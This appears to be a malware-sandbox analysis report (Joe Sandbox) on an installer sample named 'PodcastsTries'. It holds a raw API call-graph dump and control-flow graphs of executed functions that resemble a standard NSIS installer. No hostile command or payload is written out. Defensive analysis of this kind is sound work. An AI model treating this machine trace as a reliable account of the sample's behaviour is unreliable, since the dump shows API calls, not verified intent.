3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4891 402da5 4892 4030e3 4891->4892 4893 402dac 4891->4893 4894 401446 18 API calls 4893->4894 4895 402db8 4894->4895 4896 402dbf SetFilePointer 4895->4896 4896->4892 4897 402dcf 4896->4897 4897->4892 4899 405f7d wsprintfW 4897->4899 4899->4892 4900 4049a8 GetDlgItem GetDlgItem 4901 4049fe 7 API calls 4900->4901 4906 404c16 4900->4906 4902 404aa2 DeleteObject 4901->4902 4903 404a96 SendMessageW 4901->4903 4904 404aad 4902->4904 4903->4902 4907 404ae4 4904->4907 4910 406831 18 API calls 4904->4910 4905 404cfb 4908 404da0 4905->4908 4909 404c09 4905->4909 4914 404d4a SendMessageW 4905->4914 4906->4905 4918 40487a 5 API calls 4906->4918 4931 404c86 4906->4931 4913 403d6b 19 API calls 4907->4913 4911 404db5 4908->4911 4912 404da9 SendMessageW 4908->4912 4915 403df6 8 API calls 4909->4915 4916 404ac6 SendMessageW SendMessageW 4910->4916 4923 404dc7 ImageList_Destroy 4911->4923 4924 404dce 4911->4924 4929 404dde 4911->4929 4912->4911 4919 404af8 4913->4919 4914->4909 4921 404d5f SendMessageW 4914->4921 4922 404f97 4915->4922 4916->4904 4917 404ced SendMessageW 4917->4905 4918->4931 4925 403d6b 19 API calls 4919->4925 4920 404f48 4920->4909 4930 404f5d ShowWindow GetDlgItem ShowWindow 4920->4930 4926 404d72 4921->4926 4923->4924 4927 404dd7 GlobalFree 4924->4927 4924->4929 4933 404b09 4925->4933 4935 404d83 SendMessageW 4926->4935 4927->4929 4928 404bd6 GetWindowLongW SetWindowLongW 4932 404bf0 4928->4932 4929->4920 4934 40141d 80 API calls 4929->4934 4944 404e10 4929->4944 4930->4909 4931->4905 4931->4917 4936 404bf6 ShowWindow 4932->4936 4937 404c0e 4932->4937 4933->4928 4939 404b65 SendMessageW 4933->4939 4940 404bd0 4933->4940 4942 404b93 SendMessageW 4933->4942 4943 404ba7 SendMessageW 4933->4943 4934->4944 4935->4908 4951 403dc4 SendMessageW 4936->4951 4952 403dc4 SendMessageW 4937->4952 4939->4933 4940->4928 4940->4932 4942->4933 4943->4933 4945 404e54 4944->4945 4948 404e3e SendMessageW 4944->4948 4946 404f1f InvalidateRect 4945->4946 4950 404ecd SendMessageW SendMessageW 4945->4950 4946->4920 4947 404f35 4946->4947 4949 4043d9 21 API calls 4947->4949 4948->4945 4949->4920 4950->4945 4951->4909 4952->4906 4953 4030a9 SendMessageW 4954 4030c2 InvalidateRect 4953->4954 4955 4030e3 4953->4955 4954->4955 3897 4038af #17 SetErrorMode OleInitialize 3898 406328 3 API calls 3897->3898 3899 4038f2 SHGetFileInfoW 3898->3899 3971 406035 lstrcpynW 3899->3971 3901 40391d GetCommandLineW 3972 406035 lstrcpynW 3901->3972 3903 40392f GetModuleHandleW 3904 403947 3903->3904 3905 405d32 CharNextW 3904->3905 3906 403956 CharNextW 3905->3906 3917 403968 3906->3917 3907 403a02 3908 403a21 GetTempPathW 3907->3908 3973 4037f8 3908->3973 3910 403a37 3912 403a3b GetWindowsDirectoryW lstrcatW 3910->3912 3913 403a5f DeleteFileW 3910->3913 3911 405d32 CharNextW 3911->3917 3915 4037f8 11 API calls 3912->3915 3981 4035b3 GetTickCount GetModuleFileNameW 3913->3981 3918 403a57 3915->3918 3916 403a73 3919 403af8 3916->3919 3921 405d32 CharNextW 3916->3921 3957 403add 3916->3957 3917->3907 3917->3911 3924 403a04 3917->3924 3918->3913 3918->3919 4066 403885 3919->4066 3925 403a8a 3921->3925 4073 406035 lstrcpynW 3924->4073 3936 403b23 lstrcatW lstrcmpiW 3925->3936 3937 403ab5 3925->3937 3926 403aed 3929 406113 9 API calls 3926->3929 3927 403bfa 3930 403c7d 3927->3930 3932 406328 3 API calls 3927->3932 3928 403b0d 3931 405ccc MessageBoxIndirectW 3928->3931 3929->3919 3933 403b1b ExitProcess 3931->3933 3935 403c09 3932->3935 3939 406328 3 API calls 3935->3939 3936->3919 3938 403b3f CreateDirectoryW SetCurrentDirectoryW 3936->3938 4074 4067aa 3937->4074 3941 403b62 3938->3941 3942 403b57 3938->3942 3943 403c12 3939->3943 4091 406035 lstrcpynW 3941->4091 4090 406035 lstrcpynW 3942->4090 3947 406328 3 API calls 3943->3947 3950 403c1b 3947->3950 3949 403b70 4092 406035 lstrcpynW 3949->4092 3951 403c69 ExitWindowsEx 3950->3951 3956 403c29 GetCurrentProcess 3950->3956 3951->3930 3955 403c76 3951->3955 3952 403ad2 4089 406035 lstrcpynW 3952->4089 3958 40141d 80 API calls 3955->3958 3960 403c39 3956->3960 4009 405958 3957->4009 3958->3930 3959 406831 18 API calls 3961 403b98 DeleteFileW 3959->3961 3960->3951 3962 403ba5 CopyFileW 3961->3962 3968 403b7f 3961->3968 3962->3968 3963 403bee 3964 406c94 42 API calls 3963->3964 3966 403bf5 3964->3966 3965 406c94 42 API calls 3965->3968 3966->3919 3967 406831 18 API calls 3967->3968 3968->3959 3968->3963 3968->3965 3968->3967 3970 403bd9 CloseHandle 3968->3970 4093 405c6b CreateProcessW 3968->4093 3970->3968 3971->3901 3972->3903 3974 406064 5 API calls 3973->3974 3975 403804 3974->3975 3976 40380e 3975->3976 3977 40674e 3 API calls 3975->3977 3976->3910 3978 403816 CreateDirectoryW 3977->3978 4096 405eab 3978->4096 4100 405e7c GetFileAttributesW CreateFileW 3981->4100 3983 4035f3 4003 403603 3983->4003 4101 406035 lstrcpynW 3983->4101 3985 403619 4102 40677d lstrlenW 3985->4102 3989 40362a GetFileSize 3990 403726 3989->3990 4004 403641 3989->4004 4107 4032d2 3990->4107 3992 40372f 3994 40376b GlobalAlloc 3992->3994 3992->4003 4119 403368 SetFilePointer 3992->4119 3993 403336 ReadFile 3993->4004 4118 403368 SetFilePointer 3994->4118 3997 4037e9 4000 4032d2 6 API calls 3997->4000 3998 403786 4001 40337f 33 API calls 3998->4001 3999 40374c 4002 403336 ReadFile 3999->4002 4000->4003 4007 403792 4001->4007 4006 403757 4002->4006 4003->3916 4004->3990 4004->3993 4004->3997 4004->4003 4005 4032d2 6 API calls 4004->4005 4005->4004 4006->3994 4006->4003 4007->4003 4007->4007 4008 4037c0 SetFilePointer 4007->4008 4008->4003 4010 406328 3 API calls 4009->4010 4011 40596c 4010->4011 4012 405972 4011->4012 4013 405984 4011->4013 4133 405f7d wsprintfW 4012->4133 4014 405eff 3 API calls 4013->4014 4015 4059b5 4014->4015 4017 4059d4 lstrcatW 4015->4017 4019 405eff 3 API calls 4015->4019 4018 405982 4017->4018 4124 403ec1 4018->4124 4019->4017 4022 4067aa 18 API calls 4023 405a06 4022->4023 4024 405a9c 4023->4024 4026 405eff 3 API calls 4023->4026 4025 4067aa 18 API calls 4024->4025 4027 405aa2 4025->4027 4028 405a38 4026->4028 4029 405ab2 4027->4029 4030 406831 18 API calls 4027->4030 4028->4024 4032 405a5b lstrlenW 4028->4032 4035 405d32 CharNextW 4028->4035 4031 405ad2 LoadImageW 4029->4031 4135 403ea0 4029->4135 4030->4029 4033 405b92 4031->4033 4034 405afd RegisterClassW 4031->4034 4036 405a69 lstrcmpiW 4032->4036 4037 405a8f 4032->4037 4041 40141d 80 API calls 4033->4041 4039 405b9c 4034->4039 4040 405b45 SystemParametersInfoW CreateWindowExW 4034->4040 4042 405a56 4035->4042 4036->4037 4043 405a79 GetFileAttributesW 4036->4043 4045 40674e 3 API calls 4037->4045 4039->3926 4040->4033 4046 405b98 4041->4046 4042->4032 4047 405a85 4043->4047 4044 405ac8 4044->4031 4048 405a95 4045->4048 4046->4039 4049 403ec1 19 API calls 4046->4049 4047->4037 4050 40677d 2 API calls 4047->4050 4134 406035 lstrcpynW 4048->4134 4052 405ba9 4049->4052 4050->4037 4053 405bb5 ShowWindow LoadLibraryW 4052->4053 4054 405c38 4052->4054 4055 405bd4 LoadLibraryW 4053->4055 4056 405bdb GetClassInfoW 4053->4056 4057 405073 83 API calls 4054->4057 4055->4056 4058 405c05 DialogBoxParamW 4056->4058 4059 405bef GetClassInfoW RegisterClassW 4056->4059 4060 405c3e 4057->4060 4063 40141d 80 API calls 4058->4063 4059->4058 4061 405c42 4060->4061 4062 405c5a 4060->4062 4061->4039 4065 40141d 80 API calls 4061->4065 4064 40141d 80 API calls 4062->4064 4063->4039 4064->4039 4065->4039 4067 40389d 4066->4067 4068 40388f CloseHandle 4066->4068 4142 403caf 4067->4142 4068->4067 4073->3908 4195 406035 lstrcpynW 4074->4195 4076 4067bb 4077 405d85 4 API calls 4076->4077 4078 4067c1 4077->4078 4079 406064 5 API calls 4078->4079 4086 403ac3 4078->4086 4082 4067d1 4079->4082 4080 406809 lstrlenW 4081 406810 4080->4081 4080->4082 4084 40674e 3 API calls 4081->4084 4082->4080 4083 406301 2 API calls 4082->4083 4082->4086 4087 40677d 2 API calls 4082->4087 4083->4082 4085 406816 GetFileAttributesW 4084->4085 4085->4086 4086->3919 4088 406035 lstrcpynW 4086->4088 4087->4080 4088->3952 4089->3957 4090->3941 4091->3949 4092->3968 4094 405ca6 4093->4094 4095 405c9a CloseHandle 4093->4095 4094->3968 4095->4094 4097 405eb8 GetTickCount GetTempFileNameW 4096->4097 4098 40382a 4097->4098 4099 405eee 4097->4099 4098->3910 4099->4097 4099->4098 4100->3983 4101->3985 4103 40678c 4102->4103 4104 406792 CharPrevW 4103->4104 4105 40361f 4103->4105 4104->4103 4104->4105 4106 406035 lstrcpynW 4105->4106 4106->3989 4108 4032f3 4107->4108 4109 4032db 4107->4109 4112 403303 GetTickCount 4108->4112 4113 4032fb 4108->4113 4110 4032e4 DestroyWindow 4109->4110 4111 4032eb 4109->4111 4110->4111 4111->3992 4115 403311 CreateDialogParamW ShowWindow 4112->4115 4116 403334 4112->4116 4120 40635e 4113->4120 4115->4116 4116->3992 4118->3998 4119->3999 4121 40637b PeekMessageW 4120->4121 4122 406371 DispatchMessageW 4121->4122 4123 403301 4121->4123 4122->4121 4123->3992 4125 403ed5 4124->4125 4140 405f7d wsprintfW 4125->4140 4127 403f49 4128 406831 18 API calls 4127->4128 4129 403f55 SetWindowTextW 4128->4129 4130 403f70 4129->4130 4131 403f8b 4130->4131 4132 406831 18 API calls 4130->4132 4131->4022 4132->4130 4133->4018 4134->4024 4141 406035 lstrcpynW 4135->4141 4137 403eb4 4138 40674e 3 API calls 4137->4138 4139 403eba lstrcatW 4138->4139 4139->4044 4140->4127 4141->4137 4143 403cbd 4142->4143 4144 4038a2 4143->4144 4145 403cc2 FreeLibrary GlobalFree 4143->4145 4146 406cc7 4144->4146 4145->4144 4145->4145 4147 4067aa 18 API calls 4146->4147 4148 406cda 4147->4148 4149 406ce3 DeleteFileW 4148->4149 4150 406cfa 4148->4150 4189 4038ae CoUninitialize 4149->4189 4151 406e77 4150->4151 4193 406035 lstrcpynW 4150->4193 4157 406301 2 API calls 4151->4157 4177 406e84 4151->4177 4151->4189 4153 406d25 4154 406d39 4153->4154 4155 406d2f lstrcatW 4153->4155 4158 40677d 2 API calls 4154->4158 4156 406d3f 4155->4156 4160 406d4f lstrcatW 4156->4160 4162 406d57 lstrlenW FindFirstFileW 4156->4162 4159 406e90 4157->4159 4158->4156 4163 40674e 3 API calls 4159->4163 4159->4189 4160->4162 4161 4062cf 11 API calls 4161->4189 4166 406e67 4162->4166 4190 406d7e 4162->4190 4164 406e9a 4163->4164 4167 4062cf 11 API calls 4164->4167 4165 405d32 CharNextW 4165->4190 4166->4151 4168 406ea5 4167->4168 4169 405e5c 2 API calls 4168->4169 4170 406ead RemoveDirectoryW 4169->4170 4174 406ef0 4170->4174 4175 406eb9 4170->4175 4171 406e44 FindNextFileW 4173 406e5c FindClose 4171->4173 4171->4190 4173->4166 4176 404f9e 25 API calls 4174->4176 4175->4177 4178 406ebf 4175->4178 4176->4189 4177->4161 4180 4062cf 11 API calls 4178->4180 4179 4062cf 11 API calls 4179->4190 4181 406ec9 4180->4181 4184 404f9e 25 API calls 4181->4184 4182 406cc7 72 API calls 4182->4190 4183 405e5c 2 API calls 4185 406dfa DeleteFileW 4183->4185 4186 406ed3 4184->4186 4185->4190 4187 406c94 42 API calls 4186->4187 4187->4189 4188 404f9e 25 API calls 4188->4171 4189->3927 4189->3928 4190->4165 4190->4171 4190->4179 4190->4182 4190->4183 4190->4188 4191 404f9e 25 API calls 4190->4191 4192 406c94 42 API calls 4190->4192 4194 406035 lstrcpynW 4190->4194 4191->4190 4192->4190 4193->4153 4194->4190 4195->4076 4956 401cb2 4957 40145c 18 API calls 4956->4957 4958 401c54 4957->4958 4959 4062cf 11 API calls 4958->4959 4960 401c64 4958->4960 4961 401c59 4959->4961 4962 406cc7 81 API calls 4961->4962 4962->4960 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4963 402238 4964 40145c 18 API calls 4963->4964 4965 40223e 4964->4965 4966 4062cf 11 API calls 4965->4966 4967 40224b 4966->4967 4968 404f9e 25 API calls 4967->4968 4969 402255 4968->4969 4970 405c6b 2 API calls 4969->4970 4971 40225b 4970->4971 4972 4062cf 11 API calls 4971->4972 4980 4022ac CloseHandle 4971->4980 4977 40226d 4972->4977 4974 4030e3 4975 402283 WaitForSingleObject 4976 402291 GetExitCodeProcess 4975->4976 4975->4977 4979 4022a3 4976->4979 4976->4980 4977->4975 4978 40635e 2 API calls 4977->4978 4977->4980 4978->4975 4982 405f7d wsprintfW 4979->4982 4980->4974 4982->4980 3782 401eb9 3783 401f24 3782->3783 3786 401ec6 3782->3786 3784 401f53 GlobalAlloc 3783->3784 3788 401f28 3783->3788 3790 406831 18 API calls 3784->3790 3785 401ed5 3789 4062cf 11 API calls 3785->3789 3786->3785 3792 401ef7 3786->3792 3787 401f36 3806 406035 lstrcpynW 3787->3806 3788->3787 3791 4062cf 11 API calls 3788->3791 3801 401ee2 3789->3801 3794 401f46 3790->3794 3791->3787 3804 406035 lstrcpynW 3792->3804 3796 402708 3794->3796 3797 402387 GlobalFree 3794->3797 3797->3796 3798 401f06 3805 406035 lstrcpynW 3798->3805 3799 406831 18 API calls 3799->3801 3801->3796 3801->3799 3802 401f15 3807 406035 lstrcpynW 3802->3807 3804->3798 3805->3802 3806->3794 3807->3796 4983 404039 4984 404096 4983->4984 4985 404046 lstrcpynA lstrlenA 4983->4985 4985->4984 4986 404077 4985->4986 4986->4984 4987 404083 GlobalFree 4986->4987 4987->4984

                                                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                                                          Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426176,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                                                                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                                                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                                                          • API String ID: 2110491804-1641061399
                                                                                                                                                                                                                                                                                                          • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                                                          • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                                                                                                                                                                                                                                                                          Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
